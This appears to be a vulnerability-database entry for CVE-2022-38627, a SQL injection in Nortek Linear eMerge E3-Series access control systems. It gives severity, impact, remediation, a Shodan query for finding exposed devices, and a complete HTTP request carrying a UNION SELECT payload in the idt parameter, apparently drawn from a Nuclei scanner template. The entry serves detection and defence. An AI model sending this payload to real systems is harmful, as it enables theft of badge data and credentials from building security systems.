| Title | Nortek Linear eMerge E3-Series - SQL Injection |
|---|---|
| Author | daffainfo,omarhashem666 |
| Severity | Critical |
| Impact | Unauthenticated attackers can exploit SQL injection in the idt parameter to extract sensitive access control data including badge information, user credentials, and building security configurations from the eMerge access control system. |
| Remediation | Update Nortek Linear eMerge E3-Series firmware to a patched version that uses parameterized queries and properly sanitizes the idt parameter. |
| CVSS Score | 9.8 |
| EPSS Score | 0.73261 |
| CVE ID | CVE-2022-38627 |
| CWE ID | CWE-89 |
| Shodan Query | http.title:"Linear eMerge" |
| Tags | cve cve2022 emerge nortek linear sqli vkev vuln |
Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a SQL injection vulnerability via the idt parameter.
GET /badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%2738FBoXDsNJxl0tvZJCx0JLptVdo%27||%27CVE%27||(7*7*7*7)||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0 Safari/602.4.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38627.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-38627.pcap
N/AN/A